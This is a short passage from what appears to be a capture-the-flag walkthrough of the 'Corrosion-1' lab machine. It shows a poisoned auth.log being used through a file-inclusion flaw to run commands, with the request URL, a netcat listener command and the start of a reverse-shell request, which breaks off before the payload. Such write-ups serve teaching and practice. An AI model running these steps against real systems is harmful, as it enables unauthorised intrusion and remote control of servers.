http://r2km7u25qebaefa7b6jdcjldymc2u337vzpx7ne773ypgs3qlq4xycqd.onion/index.php?page=Corrosion-1
Getting a Reverse Shell With the PHP code now in the auth.log, I could execute system commands by accessing the log through the LFI vulnerability and providing a command via the GET parameter: http://[TARGET_IP]/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=id To obtain a proper shell, I set up a netcat listener on my attack machine: $ nc -lvnp 4444 Then I sent a URL-encoded PHP reverse shell command to the target: http://[TARGET_IP]/blog-post/archives/randylogs.php?